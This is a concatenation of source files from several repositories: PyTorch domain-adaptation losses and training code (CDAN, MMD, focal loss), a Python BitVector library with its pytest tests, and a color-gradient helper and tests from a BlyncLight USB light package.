features. Its input shape is (N, F) and output shape is (N, 1)
entropy_conditioning (bool, optional): If True, use entropy-aware weight to reweight each training example.
Default: False
randomized (bool, optional): If True, use `randomized multi linear map`. Else, use `multi linear map`.
Default: False
num_classes (int, optional): Number of classes. Default: -1
features_dim (int, optional): Dimension of input features. Default: -1
randomized_dim (int, optional): Dimension of features after randomized. Default: 1024
reduction (str, optional): Specifies the reduction to apply to the output:
``'none'`` | ``'mean'`` | ``'sum'``. ``'none'``: no reduction will be applied,
``'mean'``: the sum of the output will be divided by the number of
elements in the output, ``'sum'``: the output will be summed. Default: ``'mean'``
.. note::
You need to provide `num_classes`, `features_dim` and `randomized_dim` **only when** `randomized`
is set True.
Inputs:
- g_s (tensor): unnormalized classifier predictions on source domain, :math:`g^s`
- f_s (tensor): feature representations on source domain, :math:`f^s`
- g_t (tensor): unnormalized classifier predictions on target domain, :math:`g^t`
- f_t (tensor): feature representations on target domain, :math:`f^t`
Shape:
- g_s, g_t: :math:`(minibatch, C)` where C means the number of classes.
- f_s, f_t: :math:`(minibatch, F)` where F means the dimension of input features.
- Output: scalar by default. If :attr:`reduction` is ``'none'``, then :math:`(minibatch, )`.
Examples::
>>> from dalib.modules.domain_discriminator import DomainDiscriminator
>>> from dalib.adaptation.cdan import ConditionalDomainAdversarialLoss
>>> import torch
>>> num_classes = 2
>>> feature_dim = 1024
>>> batch_size = 10
>>> discriminator = DomainDiscriminator(in_feature=feature_dim * num_classes, hidden_size=1024)
>>> loss = ConditionalDomainAdversarialLoss(discriminator, reduction='mean')
>>> # features from source domain and target domain
>>> f_s, f_t = torch.randn(batch_size, feature_dim), torch.randn(batch_size, feature_dim)
>>> # logits output from source domain adn target domain
>>> g_s, g_t = torch.randn(batch_size, num_classes), torch.randn(batch_size, num_classes)
>>> output = loss(g_s, f_s, g_t, f_t)
"""
def __init__(
self,
domain_discriminator: nn.Module,
entropy_conditioning: Optional[bool] = False,
randomized: Optional[bool] = False,
num_classes: Optional[int] = -1,
features_dim: Optional[int] = -1,
randomized_dim: Optional[int] = 1024,
reduction: Optional[str] = "mean",
):
super(ConditionalDomainAdversarialLoss, self).__init__()
self.domain_discriminator = domain_discriminator
self.grl = WarmStartGradientReverseLayer(
alpha=1.0, lo=0.0, hi=1.0, max_iters=1000, auto_step=True
)
self.entropy_conditioning = entropy_conditioning
if randomized:
assert num_classes > 0 and features_dim > 0 and randomized_dim > 0
self.map = RandomizedMultiLinearMap(
features_dim, num_classes, randomized_dim
)
else:
self.map = MultiLinearMap()
self.bce = (
lambda input, target, weight: F.binary_cross_entropy(
input, target, weight, reduction=reduction
)
if self.entropy_conditioning
else F.binary_cross_entropy(input, target, reduction=reduction)
)
self.domain_discriminator_accuracy = None
def forward(
self, g_s: torch.Tensor, f_s: torch.Tensor, g_t: torch.Tensor, f_t: torch.Tensor
) -> torch.Tensor:
f = torch.cat((f_s, f_t), dim=0)
g = torch.cat((g_s, g_t), dim=0)
g = F.softmax(g, dim=1).detach()
h = self.grl(self.map(f, g))
d = self.domain_discriminator(h)
d_label = torch.cat(
(
torch.ones((g_s.size(0), 1)).to(g_s.device),
torch.zeros((g_t.size(0), 1)).to(g_t.device),
)
)
weight = 1.0 + torch.exp(-entropy(g))
batch_size = f.size(0)
weight = weight / torch.sum(weight) * batch_size
self.domain_discriminator_accuracy = binary_accuracy(d, d_label)
return self.bce(d, d_label, weight.view_as(d))
class RandomizedMultiLinearMap(nn.Module):
"""Random multi linear map
Given two inputs :math:`f` and :math:`g`, the definition is
.. math::
T_{\odot}(f,g) = \dfrac{1}{\sqrt{d}} (R_f f) \odot (R_g g),
where :math:`\odot` is element-wise product, :math:`R_f` and :math:`R_g` are random matrices
sampled only once and fixed in training.
Args:
features_dim (int): dimension of input :math:`f`
num_classes (int): dimension of input :math:`g`
output_dim (int, optional): dimension of output tensor. Default: 1024
Shape:
- f: (minibatch, features_dim)
- g: (minibatch, num_classes)
- Outputs: (minibatch, output_dim)
"""
def __init__(
self, features_dim: int, num_classes: int, output_dim: Optional[int] = 1024
):
super(RandomizedMultiLinearMap, self).__init__()
self.Rf = torch.randn(features_dim, output_dim)
self.Rg = torch.randn(num_classes, output_dim)
self.output_dim = output_dim
def forward(self, f: torch.Tensor, g: torch.Tensor) -> torch.Tensor:
f = torch.mm(f, self.Rf.to(f.device))
g = torch.mm(g, self.Rg.to(g.device))
output = torch.mul(f, g) / np.sqrt(float(self.output_dim))
return output
class MultiLinearMap(nn.Module):
"""Multi linear map
Shape:
- f: (minibatch, F)
- g: (minibatch, C)
- Outputs: (minibatch, F * C)
"""
def __init__(self):
super(MultiLinearMap, self).__init__()
def forward(self, f: torch.Tensor, g: torch.Tensor) -> torch.Tensor:
batch_size = f.size(0)
output = torch.bmm(g.unsqueeze(2), f.unsqueeze(1))
return output.view(batch_size, -1)
def entropy(predictions: torch.Tensor, reduction="none") -> torch.Tensor:
r"""Entropy of prediction.
The definition is:
.. math::
entropy(p) = - \sum_{c=1}^C p_c \log p_c
where C is number of classes.
Args:
predictions (tensor): Classifier predictions. Expected to contain raw, normalized scores for each class
reduction (str, optional): Specifies the reduction to apply to the output:
``'none'`` | ``'mean'``. ``'none'``: no reduction will be applied,
``'mean'``: the sum of the output will be divided by the number of
elements in the output. Default: ``'mean'``
Shape:
- predictions: :math:`(minibatch, C)` where C means the number of classes.
- Output: :math:`(minibatch, )` by default. If :attr:`reduction` is ``'mean'``, then scalar.
"""
epsilon = 1e-5
H = -predictions * torch.log(predictions + epsilon)
H = H.sum(dim=1)
if reduction == "mean":
return H.mean()
else:
return H
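if __name__ == "__main__":
    # Shape sketch (illustrative, not part of the original module): both maps
    # combine features f of shape (N, F) with class probabilities g of shape
    # (N, C); entropy() returns one value per example by default.
    f = torch.randn(4, 128)
    g = F.softmax(torch.randn(4, 10), dim=1)
    print(MultiLinearMap()(f, g).shape)                         # torch.Size([4, 1280])
    print(RandomizedMultiLinearMap(128, 10, 1024)(f, g).shape)  # torch.Size([4, 1024])
    print(entropy(g).shape)                                     # torch.Size([4])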
```
#### File: competitors/mmd/train_mmd.py
```python
import torch
import torch.nn as nn
from torch.optim.lr_scheduler import LambdaLR
from torch.optim.sgd import SGD
from torchvision import transforms
from tqdm import tqdm
from competitors.mmd.dan import MultipleKernelMaximumMeanDiscrepancy
from competitors.mmd.kernels import GaussianKernel
from dataset import PixelSetData
from evaluation import validation
from transforms import Normalize, RandomSamplePixels, RandomSampleTimeSteps, ToTensor, RandomTemporalShift, Identity
from utils.train_utils import AverageMeter, cat_samples, cycle, to_cuda
from utils.metrics import accuracy
def train_mmd(model, config, writer, val_loader, device, best_model_path, fold_num, splits):
source_loader, target_loader = get_data_loaders(splits, config)
model.to(device)
if config.weights is not None:
pretrained_path = f"{config.weights}/fold_{fold_num}"
pretrained_weights = torch.load(f"{pretrained_path}/model.pt")["state_dict"]
model.load_state_dict(pretrained_weights)
linear_time = True # whether to compute MMD in linear time or quadratic
mkmmd_loss = MultipleKernelMaximumMeanDiscrepancy(
kernels=[GaussianKernel(alpha=2 ** k) for k in range(-3, 2)],
linear=linear_time
)
if config.use_default_optim:
base_lr = 1.0
classifier_params = [
{"params": model.spatial_encoder.parameters(), "lr": 0.1 * base_lr},
{"params": model.temporal_encoder.parameters(), "lr": 0.1 * base_lr},
{"params": model.decoder.parameters(), "lr": 1.0 * base_lr},
]
# lr_gamma = 0.0003
lr_gamma = 0.001
lr_decay = 0.75
optimizer = SGD(
classifier_params,
config.lr,
momentum=0.9,
weight_decay=config.weight_decay,
nesterov=True,
)
lr_scheduler = LambdaLR(
optimizer, lambda x: config.lr * (1.0 + lr_gamma * float(x)) ** (-lr_decay)
)
else:
optimizer = torch.optim.Adam(
model.parameters(),
lr=config.lr,
weight_decay=config.weight_decay,
)
lr_scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(
optimizer, T_max=config.epochs * config.steps_per_epoch, eta_min=0
)
## train
best_f1 = 0.0
criterion = nn.CrossEntropyLoss()
source_iter, target_iter = iter(cycle(source_loader)), iter(cycle(target_loader))
global_step = 0
for epoch in range(config.epochs):
progress_bar = tqdm(range(config.steps_per_epoch), desc=f'MMD Epoch {epoch + 1}/{config.epochs}')
losses = AverageMeter()
class_accs = AverageMeter()
model.train()
mkmmd_loss.train()
for _ in progress_bar:
x_s, x_t = next(source_iter), next(target_iter)
labels_s = x_s["label"].cuda()
x = cat_samples([x_s, x_t])
y, f = model(*to_cuda(x, device), return_feats=True)
y_s, _ = y.chunk(2, dim=0)
f_s, f_t = f.chunk(2, dim=0)
cls_loss = criterion(y_s, labels_s)
transfer_loss = mkmmd_loss(f_s, f_t)
loss = cls_loss + transfer_loss * config.trade_off
optimizer.zero_grad()
loss.backward()
optimizer.step()
lr_scheduler.step()
losses.update(loss.item(), config.batch_size)
class_accs.update(accuracy(y_s, labels_s), config.batch_size)
progress_bar.set_postfix(
loss=f"{losses.avg:.3f}",
class_acc=f"{class_accs.avg:.2f}",
)
if global_step % config.log_step == 0:
writer.add_scalar("train/loss", losses.val, global_step)
writer.add_scalar("train/accuracy", class_accs.val, global_step)
writer.add_scalar(
"train/lr", optimizer.param_groups[0]["lr"], global_step
)
global_step += 1
progress_bar.close()
model.eval()
best_f1 = validation(best_f1, best_model_path, config, criterion, device, epoch, model, val_loader, writer)
# save final model and use for evaluation
torch.save({'state_dict': model.state_dict()}, best_model_path)
def get_data_loaders(splits, config):
def create_data_loader(dataset):
return torch.utils.data.DataLoader(dataset,
num_workers=config.num_workers, pin_memory=True,
batch_size=config.batch_size, shuffle=True, drop_last=True)
train_transform = transforms.Compose([
RandomSamplePixels(config.num_pixels),
RandomSampleTimeSteps(config.seq_length),
RandomTemporalShift(max_shift=config.max_shift_aug, p=config.shift_aug_p) if config.with_shift_aug else Identity(),
Normalize(),
ToTensor(),
])
source_dataset = PixelSetData(config.data_root, config.source, config.classes, train_transform, indices=splits[config.source]['train'])
source_loader = create_data_loader(source_dataset)
target_dataset = PixelSetData(config.data_root, config.target, config.classes, train_transform, indices=splits[config.target]['train'])
target_loader = create_data_loader(target_dataset)
print(f'size of source dataset: {len(source_dataset)} ({len(source_loader)} batches)')
print(f'size of target dataset: {len(target_dataset)} ({len(target_loader)} batches)')
return source_loader, target_loader
```
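For intuition, a standalone sketch of the inverse-decay multiplier that the LambdaLR above applies to each parameter group's base learning rate; `config.lr` is not shown in this excerpt, so the 0.01 below is an arbitrary illustrative value:
```python
# Mirrors: LambdaLR(optimizer, lambda x: config.lr * (1 + lr_gamma * x) ** (-lr_decay))
lr, lr_gamma, lr_decay = 0.01, 0.001, 0.75

def lr_multiplier(step: int) -> float:
    return lr * (1.0 + lr_gamma * float(step)) ** (-lr_decay)

for step in (0, 1_000, 10_000, 50_000):
    # effective group lr = group_base_lr * lr_multiplier(step)
    print(step, lr_multiplier(step))
```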
#### File: timematch/utils/focal_loss.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
class FocalLoss(nn.Module):
def __init__(self, gamma=0, size_average=True):
super(FocalLoss, self).__init__()
self.gamma = gamma
self.size_average = size_average
def forward(self, input, target):
# input shape (B, C), target shape (B,)
target = target.view(-1,1)
logpt = F.log_softmax(input, dim=1)
logpt = logpt.gather(1, target)
logpt = logpt.view(-1)
pt = logpt.exp()
loss = -1 * (1-pt)**self.gamma * logpt
if self.size_average: return loss.mean()
else: return loss.sum()
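# Illustrative usage sketch appended for this excerpt (not part of the original
# module): FocalLoss expects raw logits of shape (B, C) and integer class
# targets of shape (B,); with gamma=0 it reduces to plain cross-entropy.
if __name__ == "__main__":
    logits = torch.randn(4, 10)
    targets = torch.randint(0, 10, (4,))
    print(FocalLoss(gamma=2.0)(logits, targets).item())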
``` |
{
"source": "JnyJny/bitvector",
"score": 4
} |
#### File: bitvector/bitvector/bitvector.py
```python
import functools
import operator
from typing import cast, Union
@functools.total_ordering
class BitVector:
"""A Bit Vector is a list of bits in packed (integer)
format that can be accessed by indexing into the vector
or using a slice (via conventional square brackets
notation).
"""
@classmethod
def zeros(cls, size: int = 128):
"""Create a BitVector initialized with zeros.
:param size: int
"""
return cls(size=size)
@classmethod
def ones(cls, size: int = 128):
"""Create a BitVector initialized with ones.
:param size: int
"""
bv = cls(size=size)
bv.set()
return bv
def __init__(self, value: int = 0, size: int = 128):
"""Initialize a BitVector with integer value and size in bits.
:param value: int
:param size: int
Raises:
- ValueError if size <= 0
"""
if size <= 0:
raise ValueError("Size must be greater than zero.")
self.MAX = (1 << size) - 1
self.value = value
@property
def value(self) -> int:
"""The integer value of this BitVector."""
return getattr(self, "_value", 0)
@value.setter
def value(self, new_value: int) -> None:
self._value = int(new_value) & self.MAX
def clear(self):
"""Clears all bits in the vector to zero."""
self._value = 0
def set(self):
"""Sets all bits in the vector to one."""
self._value = self.MAX
def _getb(self, offset: int) -> int:
"""Retrieves the bit value at offset."""
if offset > len(self) - 1:
raise IndexError(offset)
return (self.value >> offset) & 0x1
def _setb(self, offset: int) -> None:
"""Sets the bit value at offset."""
if offset > (len(self) - 1):
raise IndexError(offset)
self.value |= (1 << offset) & self.MAX
def _clrb(self, offset: int) -> None:
"""Clears the bit value at offset."""
self.value &= ~(1 << offset)
def _setval(self, offset: int, value: int):
if value:
self._setb(offset)
else:
self._clrb(offset)
def toggle(self, offset: int) -> int:
"""Toggle the bit at `offset` in the vector and return the previous value.
:param offset: int
:return: int
"""
prev = self._getb(offset)
self.value ^= (1 << offset) & self.MAX
return prev
def __repr__(self) -> str:
return f"{self.__class__.__name__}(value={self!s}, size={len(self)})"
def __str__(self) -> str:
nibbles = (len(self) // 4) + (1 if (len(self) % 4) else 0)
return "0x" + hex(self.value)[2:].zfill(nibbles)
def __len__(self) -> int:
"""Length of the vector in bits."""
try:
return self._len
except AttributeError:
pass
self._len: int = self.MAX.bit_length()
return self._len
def __getitem__(self, key: Union[int, slice]) -> int:
"""Given a key, retrieve a bit or bitfield."""
if isinstance(key, int):
offset: int = cast(int, key)
if offset < 0:
offset += len(self)
return self._getb(offset)
if isinstance(key, slice):
rng: slice = cast(slice, key)
value = 0
for n, b in enumerate(range(*rng.indices(len(self)))):
v = self._getb(b)
if v:
value += 1 << n
return value
raise ValueError(f"Unknown key type: {type(key)}")
def __setitem__(self, key: Union[int, slice], value: Union[int, bool]) -> None:
"""Given a key, set a bit or bitfield to the supplied value.
If value is True or False and the key is a slice describing a
bit field, each bit in the field takes on the value. Otherwise,
the value is left shifted and the lsb is added to the next offset
in the bit field.
> b[:8] = True # results in bit0:bit7 == 0b11111111
> b[:8] = 0x1 # results in bit0:bit7 == 0b00000001
The difference is subtle and perhaps should not be considered a feature.
Supports negative indexing.
"""
if isinstance(key, int):
offset = int(key)
if offset < 0:
offset += len(self)
self._setval(offset, value)
return
try:
if value is True or value is False:
for b in range(*key.indices(len(self))):
self._setval(b, value)
return
for n, b in enumerate(range(*key.indices(len(self)))):
self._setval(b, (value >> n) & 0x1)
except AttributeError:
raise ValueError("Expected int or slice key") from None
def __binary_op(self, other, func, return_obj: bool = False, reverse: bool = False):
"""Calls the supplied function `func` with self and other.
If the user sets return_obj to True, a new BitVector initialized with the
results of `func` is returned. Otherwise the return type is assumed to be
`int`.
:param other: Union[int, BitVector]
:param func: callable from operator
:param return_obj: bool
:return: Union[int, bool, BitVector]
"""
try:
retval = func(self.value, other.value)
if return_obj:
size = len(min(self, other, key=len))
retval = self.__class__(retval, size=size)
return retval
except AttributeError:
pass
if reverse:
return func(other, self.value)
retval = func(self.value, other)
if return_obj:
retval = self.__class__(retval, size=len(self))
return retval
def __unary_op(self, func, return_obj: bool = False):
"""Calls the supplied function `func` with self and returns the result.
If return_obj is True, the return value is a BitVector initialized from
the results of `func`.
:param func: callable from operator
:param return_obj: bool
:return: Union[int, BitVector]
"""
retval = func(self.value) & self.MAX
if return_obj:
retval = self.__class__(retval, size=len(self))
return retval
def __inplace_op(self, other, func) -> object:
"""Calls the supplied binary function `func` with self and other
and updates self with the results.
:param other: Union[int, BitVector]
:param func: Callable from operator
:return: self
"""
try:
self.value = func(self.value, other.value)
except AttributeError:
self.value = func(self.value, other)
return self
@property
def bin(self) -> str:
"""Binary string representation of BitVector."""
return f"0b{bin(self.value)[2:].zfill(len(self))}"
@property
def hex(self) -> str:
"""Hexadecimal string representation of BitVector."""
return hex(self.value)
@property
def bytes(self) -> bytes:
"""Byte array representation of BitVector."""
n = len(self) // 8 + (1 if len(self) % 8 else 0)
return self.value.to_bytes(n, "big")
def __bool__(self) -> bool:
"""Returns False if zero else True."""
return bool(self.value)
def __eq__(self, other) -> bool:
"""Tests equality between BitVector and other.
:param other: Union[BitVector, int]
:return: bool
"""
return self.__binary_op(other, operator.eq)
def __gt__(self, other) -> bool:
"""True if BitVector is greater than other.
:param other: Union[BitVector, int]
:return: bool
"""
return self.__binary_op(other, operator.gt)
def __add__(self, other):
"""Add BitVector to other and return a BitVector initialized with the sum.
:param other: Union[BitVector|int]
:return: BitVector
"""
return self.__binary_op(other, operator.add, return_obj=True)
def __radd__(self, other) -> int:
"""Add BitVector to other, returning integer value.
:param other: int
:return: int
"""
return self.__binary_op(other, operator.add, reverse=True)
def __iadd__(self, other):
"""Add `other` to self in-place.
:param other: Union[BitVector, int]
:return: self
"""
return self.__inplace_op(other, operator.add)
def __sub__(self, other):
"""Subtract other from self and return a BitVector intialized with the difference.
:param other: Union[BitVector, int]
:return: BitVector
"""
return self.__binary_op(other, operator.sub, return_obj=True)
def __rsub__(self, other):
"""Subtract this BitVector from an int and return the integer difference.
:param other: int
:return: int
"""
return self.__binary_op(other, operator.sub, reverse=True)
def __isub__(self, other):
"""Subtract other from this BitVector in-place.
:param other: Union[BitVector, int]
:return: BitVector
"""
return self.__inplace_op(other, operator.sub)
def __mul__(self, other):
"""Multiply BitVector with other and return a BitVector initialized with the product.
:param other: Union[BitVector, int]
:return: BitVector
"""
return self.__binary_op(other, operator.mul, return_obj=True)
def __rmul__(self, other):
"""Multiply other with the integral value of this BitVector and return an the product.
:param other: Union[BitVector, int]
:return: int
"""
return self.__binary_op(other, operator.mul, reverse=True)
def __imul__(self, other):
"""Multiply BitVector with other and update in-place.
:param other: Union[BitVector, int]
:return: self
"""
return self.__inplace_op(other, operator.mul)
def __truediv__(self, other):
"""Divide BitVector with other and return a BitVector initialized with the quotient.
:param other: Union[BitVector, int, float]
:param: BitVector
"""
return self.__binary_op(other, operator.truediv, return_obj=True)
def __rtruediv__(self, other):
"""Divide other with BitVector and return a float quotient.
:param other: Union[BitVector, int, float]
:return: float
"""
return self.__binary_op(other, operator.truediv, reverse=True)
def __itruediv__(self, other):
"""Divide BitVector by other and update in-place.
:param other: Union[BitVector, int]
:return: self
"""
return self.__inplace_op(other, operator.truediv)
def __floordiv__(self, other):
"""Divide BitVector with other and return the a BitVector initialized with the rounded quotient.
:param other: Union[BitVector, int, float]
:return: BitVector
"""
return self.__binary_op(other, operator.floordiv, return_obj=True)
def __rfloordiv__(self, other):
"""Divide other by BitVector and return a float quotient.
:param other: Union[int, float]
:return: float
"""
return self.__binary_op(other, operator.floordiv, reverse=True)
def __ifloordiv__(self, other):
"""Divide BitVector by other and update in-place.
:param other: Union[BitVector, int, float]
:return: self
"""
return self.__inplace_op(other, operator.floordiv)
def __and__(self, other):
"""Performs a bitwise AND of BitVector with other and returns a BitVector initialized with the result.
:param other: Union[BitVector, int]
:return: BitVector
"""
return self.__binary_op(other, operator.and_, return_obj=True)
def __rand__(self, other):
"""Performs a bitwise AND of other with BitVector and returns an integer result.
:param other: Union[BitVector, int]
:return: int
"""
return self.__binary_op(other, operator.and_, reverse=True)
def __iand__(self, other):
"""Performs a bitwise AND of other with BitVector in-place.
:param other: Union[BitVector, int]
:return: self
"""
return self.__inplace_op(other, operator.and_)
def __or__(self, other):
"""Performs a bitwise OR of BitVector with other and returns a BitVector initialized with the result.
:param other: Union[BitVector, int]
:return: BitVector
"""
return self.__binary_op(other, operator.or_, return_obj=True)
def __ror__(self, other):
"""Performs a bitwise OR of other with BitVector and returns the integer result.
:param other: Union[BitVector, int]
:return: int
"""
return self.__binary_op(other, operator.or_)
def __ior__(self, other):
"""Performs a bitwise OR of other with BitVector in-place.
:param other: Union[BitVector, int]
:return: self
"""
return self.__inplace_op(other, operator.or_)
def __xor__(self, other):
"""Performs a bitwise XOR of BitVector with other and returns a BitVector initialized with the result.
:param other: Union[BitVector, int]
"""
return self.__binary_op(other, operator.xor, return_obj=True)
def __rxor__(self, other):
"""Performs a bitwise XOR of other with BitVector and returns the integer result.
:param other: Union[BitVector, int]
:return: int
"""
return self.__binary_op(other, operator.xor)
def __ixor__(self, other):
"""Performs a bitwise XOR of other with BitVector in-place.
:param other: Union[BitVector, int]
:return: self
"""
return self.__inplace_op(other, operator.xor)
def __invert__(self):
"""Inverts BitVector and returns a new BitVector with the result.
:param other: Union[BitVector, int]
:return: BitVector
"""
return self.__unary_op(operator.invert, return_obj=True)
def __neg__(self):
"""Inverts BitVector and returns a new BitVector with the result.
>>> x = -BitVector(0, size=16)
>>> x.hex
'0xffff'
:param other: Union[BitVector, int]
:return: BitVector
"""
return self.__unary_op(operator.invert, return_obj=True)
def __pos__(self):
"""Returns a copy of this BitVector.
:param other: Union[BitVector, int]
"""
return self.__unary_op(operator.pos, return_obj=True)
def __lshift__(self, other):
"""Performs a bitwise left shift of BitVector by other positions and returns
a BitVector initialized with the results.
:param other: Union[BitVector, int]
:return: BitVector
"""
return self.__binary_op(other, operator.lshift, return_obj=True)
def __ilshift__(self, other):
"""Shifts the contents of BitVector left by other positions in-place.
:param other: Union[BitVector, int]
:return: self
"""
return self.__inplace_op(other, operator.lshift)
def __rshift__(self, other):
"""Performs a bitwise right shift of BitVector by other positions and returns
a BitVector initialized with the results.
:param other: Union[BitVector, int]
:return: BitVector
"""
return self.__binary_op(other, operator.rshift, return_obj=True)
def __irshift__(self, other):
"""Shifts the contents of BitVector right by other positions in-place.
:param other: Union[BitVector, int]
:return: self
"""
return self.__inplace_op(other, operator.rshift)
```
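A short usage sketch for the class above, exercising the bit and slice indexing described in `__setitem__` (the import path follows the test modules below; values are illustrative):
```python
from bitvector import BitVector

bv = BitVector(0, size=16)

bv[0] = 1        # set a single bit
bv[4:8] = True   # a bool fills the whole field: bits 4..7 -> 0b1111
bv[8:12] = 0x1   # an int is shifted in lsb-first: bits 8..11 -> 0b0001

print(bv.bin)    # binary view, zero-filled to the vector length
print(bv.hex)    # hexadecimal view
print(bv[4:8])   # read a bit field back as an int (15 here)

bv ^= 0xFFFF     # in-place operators accept ints or other BitVectors
print(len(bv), bool(bv))
```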
#### File: bitvector/tests/test_bitfield.py
```python
import pytest
from bitvector import BitVector, BitField, ReadOnlyBitField
from itertools import combinations
def test_bitfield_create_no_args():
with pytest.raises(TypeError):
BitField()
@pytest.mark.parametrize("offset", list(range(0, 128)))
def test_bitfield_create_with_offset(offset: int):
test = BitField(offset)
assert isinstance(test, BitField)
assert isinstance(test.field, slice)
assert (offset, offset + 1, 1) == test.field.indices(128)
@pytest.mark.parametrize("offset,width", list(combinations(range(1, 16), 2)))
def test_bitfield_create_with_offset_and_width(offset: int, width: int):
test = BitField(offset, width)
assert (offset, min(16, offset + width), 1) == test.field.indices(16)
def test_bitfield_in_bitvector_subclass_get_values(SixteenBitClass: type):
test = SixteenBitClass(0xABCD)
assert test == 0xABCD
assert test.byte0 == 0xCD
assert test.byte1 == 0xAB
# 0xD
assert test.bit0 == 1
assert test.bit1 == 0
assert test.bit2 == 1
assert test.bit3 == 1
# 0xC
assert test.bit4 == 0
assert test.bit5 == 0
assert test.bit6 == 1
assert test.bit7 == 1
# 0xB
assert test.bit8 == 1
assert test.bit9 == 1
assert test.bitA == 0
assert test.bitB == 1
# 0xA
assert test.bitC == 0
assert test.bitD == 1
assert test.bitE == 0
assert test.bitF == 1
def test_bitfield_in_bitvector_subclass_set_values(SixteenBitClass: type):
test = SixteenBitClass(0x0000)
assert test == 0
test.byte0 = 0x55
test.byte1 = 0xAA
assert test.byte0 == 0x55
assert test.byte1 == 0xAA
# 0x5
assert test.bit0 == 1
assert test.bit1 == 0
assert test.bit2 == 1
assert test.bit3 == 0
# 0x5
assert test.bit4 == 1
assert test.bit5 == 0
assert test.bit6 == 1
assert test.bit7 == 0
# 0xA
assert test.bit8 == 0
assert test.bit9 == 1
assert test.bitA == 0
assert test.bitB == 1
# 0xA
assert test.bitC == 0
assert test.bitD == 1
assert test.bitE == 0
assert test.bitF == 1
def test_readonly_bitfield_in_bitvector_subclass():
class TestClass(BitVector):
def __init__(self):
super().__init__(value=0xDEADBEEF, size=32)
dead = BitField(16, 16)
beef = ReadOnlyBitField(0, 16)
test = TestClass()
assert test.dead == 0xDEAD
assert test.beef == 0xBEEF
test.dead = 0xcafe
assert test.dead == 0xcafe
with pytest.raises(TypeError):
test.beef = 0x0bad
assert test.beef == 0xbeef
```
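The tests above rely on a `SixteenBitClass` fixture (and the add tests below use `BV_0` and `BV_1`) that are not included in this excerpt. A hypothetical conftest.py sketch consistent with how the tests use them (byte0/byte1 plus single-bit fields bit0..bitF); the original fixtures may be defined differently:
```python
# conftest.py -- hypothetical sketch, not the original test fixtures
import pytest
from bitvector import BitVector, BitField

@pytest.fixture
def SixteenBitClass() -> type:
    class SixteenBits(BitVector):
        byte0 = BitField(0, 8)
        byte1 = BitField(8, 8)
        bit0, bit1, bit2, bit3 = (BitField(n) for n in range(0, 4))
        bit4, bit5, bit6, bit7 = (BitField(n) for n in range(4, 8))
        bit8, bit9, bitA, bitB = (BitField(n) for n in range(8, 12))
        bitC, bitD, bitE, bitF = (BitField(n) for n in range(12, 16))

        def __init__(self, value: int = 0):
            super().__init__(value, size=16)

    return SixteenBits

@pytest.fixture
def BV_0() -> BitVector:
    return BitVector(0)  # all bits clear, default 128-bit size

@pytest.fixture
def BV_1() -> BitVector:
    return BitVector(1)  # only the lsb set
```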
#### File: bitvector/tests/test_bitvector_add.py
```python
import pytest
from bitvector import BitVector
from itertools import permutations
@pytest.mark.parametrize("value", [1 << p for p in range(0, 128)])
def test_bitvector_add_scalar(value: int, BV_0: BitVector, BV_1: BitVector):
result = BV_0 + value
assert isinstance(result, BitVector)
assert result == value
result = BV_1 + value
assert isinstance(result, BitVector)
assert result == value + 1
@pytest.mark.parametrize("value", [1 << p for p in range(0, 128)])
def test_bitvector_radd_scalar(value: int, BV_0: BitVector, BV_1: BitVector):
result = value + BV_0
assert isinstance(result, int)
assert result == value
result = value + BV_1
assert isinstance(result, int)
assert result == value + 1
@pytest.mark.parametrize("value", [1 << p for p in range(0, 128)])
def test_bitvector_add_bitvector(value: int, BV_0: BitVector, BV_1: BitVector):
expected = BitVector(value)
result = BV_0 + expected
assert isinstance(result, BitVector)
assert result == expected and result is not expected
result = BV_1 + expected
assert isinstance(result, BitVector)
assert result == expected.value + 1
@pytest.mark.parametrize("value", [1 << p for p in range(0, 128)])
def test_bitvector_iadd_scalar(value: int, BV_0: BitVector, BV_1: BitVector):
BV_0 += value
assert BV_0 == value
BV_1 += value
assert BV_1 == value + 1
@pytest.mark.parametrize("value", [1 << p for p in range(0, 128)])
def test_bitvector_iadd_bitvector(value: int, BV_0: BitVector, BV_1: BitVector):
bv = BitVector(value)
BV_0 += bv
assert BV_0 == value
BV_1 += bv
assert BV_1 == value + 1
@pytest.mark.parametrize("size_a, size_b", list(permutations(range(1, 16), 2)))
def test_bitvector_add_bitvector_mismatched_sizes(size_a, size_b):
a = BitVector(1, size=size_a)
b = BitVector(1, size=size_b)
c = a + b
assert isinstance(c, BitVector)
assert len(c) == len(min(a, b, key=len))
assert c == (2 & c.MAX)
``` |
{
"source": "JnyJny/blynclight",
"score": 5
} |
#### File: blynclight/effects/gradient.py
```python
from typing import List, Tuple
def Gradient(
start: int,
stop: int,
step: int,
red=True,
green=False,
blue=False,
reverse: bool = False,
) -> List[Tuple[int, int, int]]:
"""Returns a list of RBG tuples that describe a color gradient.
The gradient starts at `start` and finishes with `stop` with `step` sized
intervals between color tuples. If the user calls with reverse=True, the
list is reversed and appended to itself to create a ramp up/ramp down
effect.
:param start: integer
:param stop: integer
:param step: integer
:param red: bool
:param green: bool
:param blue: bool
:param reverse: bool
:return: List[Tuple[int, int, int]]
"""
colors = []
for i in range(start, stop, step):
colors.append((i if red else 0, i if blue else 0, i if green else 0))
if reverse:
colors += reversed(colors)
return colors
```
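A small usage sketch of the `Gradient` helper above (assuming it is importable from the module path in the header):
```python
from blynclight.effects.gradient import Gradient

# Eight-step red ramp from dark to bright.
ramp = Gradient(0, 256, 32)
print(ramp[0], ramp[-1])      # (0, 0, 0) ... (224, 0, 0)

# Ramp up and back down again, e.g. for a pulsing effect.
pulse = Gradient(0, 256, 32, reverse=True)
print(len(ramp), len(pulse))  # 8, 16
```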
#### File: blynclight/tests/test_blynclight.py
```python
import pytest
from dataclasses import dataclass
from blynclight import (
BlyncLight,
BlyncLightNotFound,
BlyncLightUnknownDevice,
BlyncLightInUse,
)
from blynclight.constants import (
EMBRAVA_VENDOR_IDS,
END_OF_COMMAND,
COMMAND_LENGTH,
PAD_VALUE,
)
@dataclass
class FieldToTest:
"""Encapsulates field name, a given value to set and the expected
value when the field is read.
"""
name: str
given: int
expected: int
@pytest.fixture(params=[])
def reset_field(request):
"""This fixture presents a list of FieldToTest objects for the
purpose of testing the BlyncLight.reset() method. The fields
are set to the given value and after reset should match the
expected value.
"""
return request.param
@pytest.fixture()
def number_of_lights():
"""Number of physical Embrava BlyncLight devices detected.
"""
return len(BlyncLight.available_lights())
def test_blynclight_available_lights():
"""Checks that the BlyncLight.available_lights() class method returns
a list of dictionaries, one dictionary for each BlyncLight device
discovered.
"""
info = BlyncLight.available_lights()
assert isinstance(info, list)
for entry in info:
assert isinstance(entry, dict)
